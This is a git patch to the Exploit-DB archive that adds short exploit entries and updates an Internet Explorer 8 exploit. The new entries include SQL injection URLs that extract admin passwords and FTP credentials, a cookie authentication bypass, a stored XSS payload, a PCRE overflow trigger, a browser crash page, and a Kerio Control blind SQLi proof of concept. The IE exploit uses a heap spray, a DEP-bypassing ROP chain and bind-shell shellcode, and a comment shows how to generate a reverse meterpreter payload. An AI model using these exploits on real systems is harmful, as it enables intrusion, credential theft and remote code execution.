From 7851596ba79ce3a1b32b872dfdab163522e42c7d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 4 Jul 2014 04:39:46 +0000
Subject: [PATCH] Updated 07_04_2014

---
 files.csv                           |  9 ++++
 platforms/cfm/webapps/33948.txt     | 10 ++++
 platforms/linux/remote/33949.txt    |  9 ++++
 platforms/php/webapps/33945.txt     | 12 +++++
 platforms/php/webapps/33946.txt     | 10 ++++
 platforms/php/webapps/33947.txt     |  7 +++
 platforms/php/webapps/33950.txt     |  7 +++
 platforms/php/webapps/33953.txt     | 32 +++++++++++
 platforms/php/webapps/33954.txt     | 66 +++++++++++++++++++++++
 platforms/windows/dos/33951.txt     | 63 ++++++++++++++++++++++
 platforms/windows/remote/24017.html | 84 +++++++++++++++++------------
 11 files changed, 275 insertions(+), 34 deletions(-)
 create mode 100755 platforms/cfm/webapps/33948.txt
 create mode 100755 platforms/linux/remote/33949.txt
 create mode 100755 platforms/php/webapps/33945.txt
 create mode 100755 platforms/php/webapps/33946.txt
 create mode 100755 platforms/php/webapps/33947.txt
 create mode 100755 platforms/php/webapps/33950.txt
 create mode 100755 platforms/php/webapps/33953.txt
 create mode 100755 platforms/php/webapps/33954.txt
 create mode 100755 platforms/windows/dos/33951.txt

diff --git a/files.csv b/files.csv
index 043d25b73..f11e391fa 100755
--- a/files.csv
+++ b/files.csv
@@ -30570,3 +30570,12 @@ id,file,description,date,author,platform,type,port
 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
 33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0
+33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0
+33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass Vulnerability",2010-02-01,jago-dz,php,webapps,0
+33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",php,webapps,0
+33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",cfm,webapps,0
+33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0
+33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0
+33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
+33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
+33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
diff --git a/platforms/cfm/webapps/33948.txt b/platforms/cfm/webapps/33948.txt
new file mode 100755
index 000000000..3589b7a16
--- /dev/null
+++ b/platforms/cfm/webapps/33948.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39973/info
+
+Site Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Site Manager 3.0 is vulnarable; other versions may also be affected.
+
+http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
+http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata 
\ No newline at end of file
diff --git a/platforms/linux/remote/33949.txt b/platforms/linux/remote/33949.txt
new file mode 100755
index 000000000..cb53c381a
--- /dev/null
+++ b/platforms/linux/remote/33949.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39974/info
+
+PCRE is prone to a buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of an application using the PCRE library. Failed attacks may result in denial-of-service conditions.
+
+Versions prior to PCRE 8.02 are vulnerable; applications which use the PCRE library may also be affected. 
+
+perl -e 'print "/","("x819, ")"x819, "/"' | pcretest 
\ No newline at end of file
diff --git a/platforms/php/webapps/33945.txt b/platforms/php/webapps/33945.txt
new file mode 100755
index 000000000..f09cafdcf
--- /dev/null
+++ b/platforms/php/webapps/33945.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/39962/info
+
+DeluxeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DeluxeBB 1.3 and earlier versions are vulnerable. 
+
+The following example data is available:
+
+membercookie=guest
+memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x 
\ No newline at end of file
diff --git a/platforms/php/webapps/33946.txt b/platforms/php/webapps/33946.txt
new file mode 100755
index 000000000..9389daadb
--- /dev/null
+++ b/platforms/php/webapps/33946.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39963/info
+
+EmiratesHost is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. 
+
+The following example data is available:
+
+www.example.com/admin
+javascript:document.cookie="login=right;path=/"; 
\ No newline at end of file
diff --git a/platforms/php/webapps/33947.txt b/platforms/php/webapps/33947.txt
new file mode 100755
index 000000000..66ad4ce4b
--- /dev/null
+++ b/platforms/php/webapps/33947.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39968/info
+
+Last Wizardz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin 
\ No newline at end of file
diff --git a/platforms/php/webapps/33950.txt b/platforms/php/webapps/33950.txt
new file mode 100755
index 000000000..294ab298e
--- /dev/null
+++ b/platforms/php/webapps/33950.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39978/info
+
+HAWHAW is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/wap/newsread.php?storyid=-1+UNION+SELECT+1,@@version,3,4 
\ No newline at end of file
diff --git a/platforms/php/webapps/33953.txt b/platforms/php/webapps/33953.txt
new file mode 100755
index 000000000..4f22b8ea9
--- /dev/null
+++ b/platforms/php/webapps/33953.txt
@@ -0,0 +1,32 @@
+# Affected software: Zurmo CRM
+# Zurmo is an Open Source Customer Relationship Management (CRM)
+application that is
+# mobile, social, and gamified. We use a test-driven methodology for
+building every part of the # application.
+# Type of vulnerability: XSS Stored
+# URL: zurmo.com
+#
+# Discovered by: Provensec
+# Website: http://www.provensec.com
+
+# Description: ZumoCRM is prone to a Persistent Cross Site Scripting attack
+that allows a malicious user to inject HTML or scripts that can access any
+cookies, session tokens, or other
+sensitive information retained by your browser and used with that site.
+# Proof of concept
+# 1. Create a report as a Normal user
+# 2. Select module: Accounts
+# 3. Select filter: Name
+# 4. Select column Employees and as a value use: "><script>alert('XSS by
+Provensec')</script>
+# 5. Save the report and share it with other users to distribute your
+malicious code.
+
+Screenshot attached
+
+JSacco
+CTO - Provensec.com
+
+"Think as a hacker, be professional"
+URL: http://provensec.com
+Mobile: +31 6 8209 2565
diff --git a/platforms/php/webapps/33954.txt b/platforms/php/webapps/33954.txt
new file mode 100755
index 000000000..d9646dd1d
--- /dev/null
+++ b/platforms/php/webapps/33954.txt
@@ -0,0 +1,66 @@
+Document Title: 
+======================
+Kerio Control <= 8.3.1 Boolean-based blind SQL Injection
+
+Primary Informations:
+======================
+
+Product Name: Kerio Control
+Software Description: Kerio Control brings together multiple capabilities 
+ including a network firewall and router, intrusion detection and 
+ prevention (IPS), gateway anti-virus, VPN and content filtering. These 
+ comprehensive capabilities and unmatched deployment flexibility make 
+ Kerio Control the ideal choice for small and mid-sized businesses.
+Affected Version: Latest Version - 8.3.1 (released on 2014-05-20)
+Vendor Website: http://kerio.com
+Vulnerability Type: Boolean-based blind SQL Injection
+Severity Level: Very High
+Exploitation Technique: Remote
+CVE-ID: CVE-2014-3857
+Discovered By: Khashayar Fereidani
+Main Reference: http://fereidani.com/articles/show/76_kerio_control_8_3_1_boolean_based_blind_sql_injection
+Researcher's Websites: http://fereidani.com http://fereidani.ir
+                       http://und3rfl0w.com http://ircrash.com
+Researcher's Email: info [ a t ] fereidani [ d o t ] com
+
+
+Technical Details:
+=======================
+
+Kerio Control suffers from a SQL Injection Vulnerability which can lead to gain users 
+ sensitive informations like passwords , to use this vulnerability attacker need a 
+ valid client username and password .
+
+Vulnerable path: /print.php
+Vulnerable variables: x_16 and x_17
+HTTP Method: GET
+
+Proof Of Concept:
+=======================
+
+Blind Test:
+ TRUE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=1&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l
+ FALSE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=2&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l
+ 
+
+Solution:
+========================
+Valid escaping variables or type checking for integer
+
+
+Exploit:
+========================
+Private
+
+
+Vulnerability Disclosure Timeline:
+==================================
+May 30 2014 - Disclosure 
+May 31 2014 - Received a CVE ID
+May 31 2014 - Initial Report to Kerio Security Team
+June 3 2014 - Support team replied fix is planned to be included in a future release
+June 30 2014 - Patched
+July 1 2014 - Publication
+
+
+                                           Khashayar Fereidani - http://fereidani.com
\ No newline at end of file
diff --git a/platforms/windows/dos/33951.txt b/platforms/windows/dos/33951.txt
new file mode 100755
index 000000000..9ecb74a2c
--- /dev/null
+++ b/platforms/windows/dos/33951.txt
@@ -0,0 +1,63 @@
+<!--
+
+Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)
+
+
+Vendor: Baidu, Inc.
+Product web page: http://www.baidu.com
+Affected version: 26.5.9999.3511
+
+Summary: Spark Browser is a free Internet browser with very
+sharp UIs and cool utilities. It's based on the Chromium
+technology platform, giving it fast browsing capabilities.
+
+Desc: Spark Browser version 26.5.9999.3511 allows remote
+attackers to cause a denial of service (application crash)
+resulting in stack overflow via nested calls to the window.print
+javascript function.
+
+-----------------------------------------------------------------
+
+(153c.14f4): Stack overflow - code c00000fd (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c
+eip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+ntdll!memcpy+0xbb8f:
+77e0decf 56              push    esi
+
+-----------------------------------------------------------------
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2014-5190
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php
+
+
+28.06.2014
+
+-->
+
+
+<html>
+<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
+<body bgcolor="#50708C">
+<center>
+<p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
+<button onClick=crash()>Execute!</button>
+</center>
+<script>
+function crash(){
+	window.print();
+	crash();
+}
+</script>
+</body>
+</html>
diff --git a/platforms/windows/remote/24017.html b/platforms/windows/remote/24017.html
index 3c656f72c..12e1a42d2 100755
--- a/platforms/windows/remote/24017.html
+++ b/platforms/windows/remote/24017.html
@@ -11,11 +11,12 @@
 ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
 ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
 ** Tested on Windows 7 (x86) - IE 8.0.7601.17514
+** Old version of the exploit available at: http://www.exploit-db.com/sploits/24017_old.zip
 
 ####################################################################
 
-** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :) 
-** To get it working on a different version of Windows you will require to make your own chances to the exploit :) 
+** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)
+** To get it working on a different version of Windows you will require to make your own chances to the exploit :)
 ** Have fun :)
 -->
 
@@ -26,7 +27,7 @@
 <script language='javascript'>
 
 function strtoint(str) {
-	return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
+        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
 }
 
 var free = "EEEE";
@@ -46,16 +47,16 @@ var div_container = document.getElementById("evil");
 div_container.style.cssText = "display:none";
 
 for (var i=0; i < 500; i+=2) {
-	fr[i] = free.substring(0, (0x100-6)/2);
-	al[i] = string1.substring(0, (0x100-6)/2);
-	bl[i] = string2.substring(0, (0x100-6)/2);
-	var obj = document.createElement("button");
-	div_container.appendChild(obj);
+        fr[i] = free.substring(0, (0x100-6)/2);
+        al[i] = string1.substring(0, (0x100-6)/2);
+        bl[i] = string2.substring(0, (0x100-6)/2);
+        var obj = document.createElement("button");
+        div_container.appendChild(obj);
 }
 
 for (var i=200; i<500; i+=2 ) {
-	fr[i] = null;
-	CollectGarbage();
+        fr[i] = null;
+        CollectGarbage();
 }
 
 function heapspray(cbuttonlayout) {
@@ -136,9 +137,15 @@ function heapspray(cbuttonlayout) {
     var rop23 = rop.substring(4,8);
     var rop24 = rop.substring(0,4); // } RET
 
-    var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET
-    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
-    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP
+    var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
+    shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
+    shellcode+= unescape("%u4141%u4141"); // PADDING
+
+    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
+    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
+    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
+
+    // Standard DEP bypass
     shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
     shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
     shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
@@ -158,15 +165,17 @@ function heapspray(cbuttonlayout) {
     shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
     shellcode+= unescape("%u9090%u9090"); // NOPs
     shellcode+= unescape("%u9090%u9090"); // NOPs
+    shellcode+= unescape("%u9090%u9090"); // NOPs
 
     // Bind shellcode on 4444 :)
-	// msf > generate -t js_le
-	// windows/shell_bind_tcp - 342 bytes
-	// http://www.metasploit.com
-	// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
-	// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
-	// I would keep the shellcode the same size for better reliability :)
-	
+    // msf > generate -t js_le
+    // windows/shell_bind_tcp - 342 bytes
+    // http://www.metasploit.com
+    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
+    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
+    // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp
+    // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le
+
     shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                              "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                              "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
@@ -193,7 +202,13 @@ function heapspray(cbuttonlayout) {
                              "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                              "%u006a%uff53%u41d5");
 
+    // Total spray should be 1000
+    var padding = unescape("%u9090");
+    while (padding.length < 1000)
+        padding = padding + padding;
+    var padding = padding.substr(0, 1000 - shellcode.length);
 
+    shellcode+= padding;
 
     while (shellcode.length < 100000)
         shellcode = shellcode + shellcode;
@@ -214,28 +229,29 @@ function heapspray(cbuttonlayout) {
 }
 
 function leak(){
-	var leak_col = document.getElementById("132");
-	leak_col.width = "41";
-	leak_col.span = "19";
+        var leak_col = document.getElementById("132");
+        leak_col.width = "41";
+        leak_col.span = "19";
 }
 
 function get_leak() {
-	var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
-	str_addr = str_addr - 1410704;
-	setTimeout(function(){heapspray(str_addr)}, 200);	
+        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
+        str_addr = str_addr - 1410704;
+        var hex = str_addr.toString(16);
+        //alert(hex);
+        setTimeout(function(){heapspray(str_addr)}, 50);
 }
 
 function trigger_overflow(){
-	var evil_col = document.getElementById("132");
-	evil_col.width = "1178993";
-	evil_col.span = "44";
+        var evil_col = document.getElementById("132");
+        evil_col.width = "1245880";
+        evil_col.span = "44";
 }
 
-setTimeout(function(){leak()}, 300);
-setTimeout(function(){get_leak()},700);
-//setTimeout(function(){heapspray()}, 900);
-setTimeout(function(){trigger_overflow()}, 1200);
+setTimeout(function(){leak()}, 400);
+setTimeout(function(){get_leak()},450);
+setTimeout(function(){trigger_overflow()}, 700);
 
 </script>
 </body>
-</html>
+</html>
\ No newline at end of file